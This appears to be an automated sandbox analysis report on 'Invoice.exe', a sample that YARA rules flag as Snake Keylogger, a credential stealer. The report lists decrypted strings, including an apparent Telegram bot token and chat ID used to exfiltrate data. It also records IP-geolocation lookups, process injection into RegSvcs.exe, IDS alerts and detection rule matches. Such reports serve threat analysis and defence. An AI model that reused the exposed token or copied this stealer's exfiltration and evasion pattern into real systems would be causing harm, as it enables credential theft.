Integrated Neural Analysis Model: Matched 99.7% probability

Sample uses string decryption to hide its real strings

Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack	String decryptor:
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack	String decryptor: 6820629737:AAGJ8tOkoD9jFHkd_L1kG1ntQ1J6zLhFsMc
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack	String decryptor: 6783205225
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack	String decryptor:
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack	String decryptor: 6820629737:AAGJ8tOkoD9jFHkd_L1kG1ntQ1J6zLhFsMc
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack	String decryptor: 6783205225

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49717 version: TLS 1.0

Source: Invoice.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdbMZ source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.Xml.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Accessibility.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: AofI.pdb source: Invoice.exe, WER5BC8.tmp.dmp.12.dr, HbxYXheklrhvR.exe.0.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Configuration.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Accessibility.pdbT source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.Xml.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Accessibility.pdba source: WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Drawing.pdbH source: WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: mscorlib.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Windows.Forms.pdb4 source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: AofI.pdbSHA256 source: Invoice.exe, WER5BC8.tmp.dmp.12.dr, HbxYXheklrhvR.exe.0.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Drawing.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.pdb` source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.pdbL0uw# source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr

Source: global traffic

TCP traffic: 192.168.2.4:63653 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49715 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49720 -> 104.21.16.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49717 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000009.00000002.1500060552.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Invoice.exe, 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Invoice.exe, HbxYXheklrhvR.exe.0.dr	String found in binary or memory: http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn
Source: RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Invoice.exe, 00000000.00000002.1342667781.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net
Source: RegSvcs.exe, 00000009.00000002.1500060552.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Invoice.exe, 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000009.00000002.1500060552.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63657
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63659
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63655 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 63659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63655
Source: unknown	Network traffic detected: HTTP traffic on port 63657 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_03006108	9_2_03006108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300C190	9_2_0300C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_03006730	9_2_03006730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300C753	9_2_0300C753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300C470	9_2_0300C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300B4A0	9_2_0300B4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300BBD3	9_2_0300BBD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300CA33	9_2_0300CA33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_03004AD9	9_2_03004AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_03009858	9_2_03009858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300BEB0	9_2_0300BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_03003573	9_2_03003573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0300B4F3	9_2_0300B4F3
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Code function: 13_2_0592A078	13_2_0592A078
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Code function: 13_2_059283F1	13_2_059283F1
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Code function: 13_2_05929C40	13_2_05929C40
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Code function: 13_2_05927FA8	13_2_05927FA8
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Code function: 13_2_059299D1	13_2_059299D1
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Code function: 13_2_05928828	13_2_05928828

Source: C:\Users\user\Desktop\Invoice.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1808

Source: Invoice.exe, 00000000.00000000.1179434155.0000000000684000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAofI.exe: vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1336727323.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1346188385.00000000053B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFlatForm.dll2 vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1345961116.00000000052ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAofI vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1342667781.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlatForm.dll2 vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1346930456.0000000005EB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1342667781.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Invoice.exe
Source: Invoice.exe	Binary or memory string: OriginalFilenameAofI.exe: vs Invoice.exe

Source: Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
